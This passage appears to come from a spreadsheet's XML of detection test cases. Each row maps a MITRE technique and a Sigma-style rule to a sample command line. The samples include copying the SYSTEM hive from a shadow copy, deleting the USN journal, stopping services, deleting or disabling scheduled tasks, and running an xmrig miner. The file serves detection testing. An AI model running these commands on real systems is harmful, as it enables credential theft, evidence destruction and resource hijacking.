          <t>cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive</t>
        </is>
      </c>
      <c r="F40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K40" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="inlineStr">
        <is>
          <t>t1490</t>
        </is>
      </c>
      <c r="B41" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_shadowcopy_access</t>
        </is>
      </c>
      <c r="C41" s="43" t="inlineStr">
        <is>
          <t>Copy From VolumeShadowCopy Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D41" s="43" t="inlineStr">
        <is>
          <t>c73124a7-3e89-44a3-bdc1-25fe4df754b1</t>
        </is>
      </c>
      <c r="E41" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive"</t>
        </is>
      </c>
      <c r="F41" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K41" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B42" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C42" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D42" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E42" s="43" t="inlineStr">
        <is>
          <t>fsutil  usn deletejournal /D C:</t>
        </is>
      </c>
      <c r="F42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K42" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B43" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C43" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D43" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E43" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: \</t>
        </is>
      </c>
      <c r="F43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K43" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B44" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C44" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D44" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E44" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: | Out-Null</t>
        </is>
      </c>
      <c r="F44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K44" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B45" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C45" s="43" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D45" s="43" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E45" s="43" t="inlineStr">
        <is>
          <t>fsutil usn deletejournal /D C: &gt; NUL</t>
        </is>
      </c>
      <c r="F45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K45" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B46" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_stop_service</t>
        </is>
      </c>
      <c r="C46" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D46" s="43" t="inlineStr">
        <is>
          <t>88872991-7445-4a22-90b2-a3adadb0e827</t>
        </is>
      </c>
      <c r="E46" s="43" t="inlineStr">
        <is>
          <t>net1 stop UltraViewService</t>
        </is>
      </c>
      <c r="F46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K46" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B47" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_stop_service</t>
        </is>
      </c>
      <c r="C47" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D47" s="43" t="inlineStr">
        <is>
          <t>88872991-7445-4a22-90b2-a3adadb0e827</t>
        </is>
      </c>
      <c r="E47" s="43" t="inlineStr">
        <is>
          <t>net.exe  stop spooler</t>
        </is>
      </c>
      <c r="F47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K47" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B48" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_stop_service</t>
        </is>
      </c>
      <c r="C48" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D48" s="43" t="inlineStr">
        <is>
          <t>88872991-7445-4a22-90b2-a3adadb0e827</t>
        </is>
      </c>
      <c r="E48" s="43" t="inlineStr">
        <is>
          <t>net.exe	stop	"ServiceName"</t>
        </is>
      </c>
      <c r="F48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K48" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B49" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_stop_service</t>
        </is>
      </c>
      <c r="C49" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D49" s="43" t="inlineStr">
        <is>
          <t>88872991-7445-4a22-90b2-a3adadb0e827</t>
        </is>
      </c>
      <c r="E49" s="43" t="inlineStr">
        <is>
          <t>net stop /name:UltraViewService</t>
        </is>
      </c>
      <c r="F49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K49" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B50" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C50" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D50" s="43" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E50" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Stop-Service -Name 'wuauserv'}"</t>
        </is>
      </c>
      <c r="F50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K50" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B51" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C51" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D51" s="43" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E51" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Stop-Service -Name wuauserv -Force"</t>
        </is>
      </c>
      <c r="F51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K51" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B52" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C52" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D52" s="43" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E52" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Stop-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F52" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="43" t="n"/>
      <c r="J52" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K52" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B53" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_stop_service</t>
        </is>
      </c>
      <c r="C53" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service</t>
        </is>
      </c>
      <c r="D53" s="43" t="inlineStr">
        <is>
          <t>c49c5062-0966-4170-9efd-9968c913a6cf</t>
        </is>
      </c>
      <c r="E53" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {StOp-SeRvIcE -NaMe wUaUsErV -FoRcE}"</t>
        </is>
      </c>
      <c r="F53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K53" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B54" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C54" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D54" s="43" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E54" s="43" t="inlineStr">
        <is>
          <t>sc.exe stop spooler</t>
        </is>
      </c>
      <c r="F54" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K54" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B55" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C55" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D55" s="43" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E55" s="43" t="inlineStr">
        <is>
          <t>sc stop spooler</t>
        </is>
      </c>
      <c r="F55" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K55" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B56" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C56" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D56" s="43" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E56" s="43" t="inlineStr">
        <is>
          <t>sc.exe   stop   spooler</t>
        </is>
      </c>
      <c r="F56" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K56" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B57" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_stop_service</t>
        </is>
      </c>
      <c r="C57" s="43" t="inlineStr">
        <is>
          <t>Stop Windows Service Via Sc.EXE</t>
        </is>
      </c>
      <c r="D57" s="43" t="inlineStr">
        <is>
          <t>81bcb81b-5b1f-474b-b373-52c871aaa7b1</t>
        </is>
      </c>
      <c r="E57" s="43" t="inlineStr">
        <is>
          <t>sc stop "spooler"</t>
        </is>
      </c>
      <c r="F57" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="43" t="n"/>
      <c r="J57" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K57" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B58" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C58" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D58" s="43" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E58" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /delete /f /tn "\Microsoft\Windows\BitLocker\BitLocker Encrypt All Drives"</t>
        </is>
      </c>
      <c r="F58" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K58" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B59" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C59" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D59" s="43" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E59" s="43" t="inlineStr">
        <is>
          <t>schtasks /D /F /TN "\Microsoft\Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K59" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B60" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete</t>
        </is>
      </c>
      <c r="C60" s="43" t="inlineStr">
        <is>
          <t>Delete Important Scheduled Task</t>
        </is>
      </c>
      <c r="D60" s="43" t="inlineStr">
        <is>
          <t>dbc1f800-0fe0-4bc0-9c66-292c2abe3f78</t>
        </is>
      </c>
      <c r="E60" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /delete /f /tn "\Microsoft\Windows\WindowsUpdate\"</t>
        </is>
      </c>
      <c r="F60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K60" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B61" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete_all</t>
        </is>
      </c>
      <c r="C61" s="43" t="inlineStr">
        <is>
          <t>Delete All Scheduled Tasks</t>
        </is>
      </c>
      <c r="D61" s="43" t="inlineStr">
        <is>
          <t>220457c1-1c9f-4c2e-afe6-9598926222c1</t>
        </is>
      </c>
      <c r="E61" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /delete /tn '*' /f</t>
        </is>
      </c>
      <c r="F61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K61" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B62" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete_all</t>
        </is>
      </c>
      <c r="C62" s="43" t="inlineStr">
        <is>
          <t>Delete All Scheduled Tasks</t>
        </is>
      </c>
      <c r="D62" s="43" t="inlineStr">
        <is>
          <t>220457c1-1c9f-4c2e-afe6-9598926222c1</t>
        </is>
      </c>
      <c r="E62" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -delete -tn * -f</t>
        </is>
      </c>
      <c r="F62" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K62" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B63" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete_all</t>
        </is>
      </c>
      <c r="C63" s="43" t="inlineStr">
        <is>
          <t>Delete All Scheduled Tasks</t>
        </is>
      </c>
      <c r="D63" s="43" t="inlineStr">
        <is>
          <t>220457c1-1c9f-4c2e-afe6-9598926222c1</t>
        </is>
      </c>
      <c r="E63" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /delete /tn * /f</t>
        </is>
      </c>
      <c r="F63" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="43" t="n"/>
      <c r="J63" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K63" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B64" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_delete_all</t>
        </is>
      </c>
      <c r="C64" s="43" t="inlineStr">
        <is>
          <t>Delete All Scheduled Tasks</t>
        </is>
      </c>
      <c r="D64" s="43" t="inlineStr">
        <is>
          <t>220457c1-1c9f-4c2e-afe6-9598926222c1</t>
        </is>
      </c>
      <c r="E64" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /f /delete /tn *</t>
        </is>
      </c>
      <c r="F64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="43" t="n"/>
      <c r="J64" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K64" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B65" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C65" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D65" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E65" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /change /disable /tn "\Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="43" t="n"/>
      <c r="J65" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K65" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B66" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C66" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D66" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E66" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /C "/change /disable /tn \Windows\SystemRestore\SR"</t>
        </is>
      </c>
      <c r="F66" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K66" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B67" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C67" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D67" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E67" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /change /disable /tn "\Windows\SystemRestore\SR" ^&gt;nul</t>
        </is>
      </c>
      <c r="F67" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K67" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="inlineStr">
        <is>
          <t>t1489</t>
        </is>
      </c>
      <c r="B68" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_disable</t>
        </is>
      </c>
      <c r="C68" s="43" t="inlineStr">
        <is>
          <t>Disable Important Scheduled Task</t>
        </is>
      </c>
      <c r="D68" s="43" t="inlineStr">
        <is>
          <t>9ac94dc8-9042-493c-ba45-3b5e7c86b980</t>
        </is>
      </c>
      <c r="E68" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /change /disable /tn "\Windows\SystemRestore\SR" 2^&gt;^&amp;1 ^&gt;nul</t>
        </is>
      </c>
      <c r="F68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K68" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="inlineStr">
        <is>
          <t>t1496</t>
        </is>
      </c>
      <c r="B69" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_crypto_mining_monero</t>
        </is>
      </c>
      <c r="C69" s="43" t="inlineStr">
        <is>
          <t>Potential Crypto Mining Activity</t>
        </is>
      </c>
      <c r="D69" s="43" t="inlineStr">
        <is>
          <t>66c3b204-9f88-4d0a-a7f7-8a57d521ca55</t>
        </is>
      </c>
      <c r="E69" s="43" t="inlineStr">
        <is>
          <t>xmrig.exe -o stratum+ssl://xmr-pool.example.com:443 -u wallet_address --donate-level=1 --algo rx/0</t>
        </is>
      </c>
      <c r="F69" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="43" t="n"/>
